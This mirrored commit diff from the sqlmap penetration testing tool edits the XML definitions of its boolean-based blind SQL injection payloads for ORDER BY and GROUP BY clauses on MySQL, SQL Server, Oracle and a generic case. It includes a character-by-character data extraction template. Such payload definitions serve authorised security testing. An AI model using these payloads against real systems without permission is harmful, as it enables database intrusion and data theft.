mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-06-03 20:53:26 +03:00
On the way to get full support for injection on ORDER BY and GROUP BY clauses
This commit is contained in:
Bernardo Damele
parent
47f2d22181
commit
df4cb1a601
|
|
@ -436,7 +436,7 @@ Formats:
|
||||||
|
|
||||||
<!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
<!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
|
@ -444,10 +444,10 @@ Formats:
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>MySQL</dbms>
|
<dbms>MySQL</dbms>
|
||||||
|
|
@ -456,7 +456,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
|
@ -464,10 +464,10 @@ Formats:
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>MySQL</dbms>
|
<dbms>MySQL</dbms>
|
||||||
|
|
@ -475,7 +475,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
|
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
|
@ -483,10 +483,10 @@ Formats:
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
|
|
@ -494,7 +494,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Oracle boolean-based blind - ORDER BY clause</title>
|
<title>Oracle boolean-based blind - ORDER BY clause (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
|
@ -502,10 +502,10 @@ Formats:
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END) FROM DUAL)</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Oracle</dbms>
|
<dbms>Oracle</dbms>
|
||||||
|
|
@ -515,7 +515,7 @@ Formats:
|
||||||
<!-- TODO: check against Microsoft Access, Firebird and SAP MaxDB -->
|
<!-- TODO: check against Microsoft Access, Firebird and SAP MaxDB -->
|
||||||
<!-- NOTE: this does not behave as expected against SQLite, need to find another payload (TODO) -->
|
<!-- NOTE: this does not behave as expected against SQLite, need to find another payload (TODO) -->
|
||||||
<test>
|
<test>
|
||||||
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
|
@ -523,26 +523,26 @@ Formats:
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>MySQL</dbms>
|
<dbms>MySQL</dbms>
|
||||||
|
|
@ -551,7 +551,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>5</level>
|
<level>5</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
|
@ -559,10 +559,10 @@ Formats:
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>MySQL</dbms>
|
<dbms>MySQL</dbms>
|
||||||
|
|
@ -570,7 +570,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
|
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
|
@ -578,10 +578,10 @@ Formats:
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
|
|
@ -589,7 +589,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Oracle boolean-based blind - ORDER BY clause</title>
|
<title>Oracle boolean-based blind - ORDER BY clause (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
|
@ -597,10 +597,10 @@ Formats:
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END) FROM DUAL)</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Oracle</dbms>
|
<dbms>Oracle</dbms>
|
||||||
|
|
@ -610,7 +610,7 @@ Formats:
|
||||||
<!-- TODO: check against Microsoft Access, Firebird and SAP MaxDB -->
|
<!-- TODO: check against Microsoft Access, Firebird and SAP MaxDB -->
|
||||||
<!-- NOTE: this does not behave as expected against SQLite, need to find another payload (TODO) -->
|
<!-- NOTE: this does not behave as expected against SQLite, need to find another payload (TODO) -->
|
||||||
<test>
|
<test>
|
||||||
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
|
@ -618,10 +618,10 @@ Formats:
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
</test>
|
</test>
|
||||||
<!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
<!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user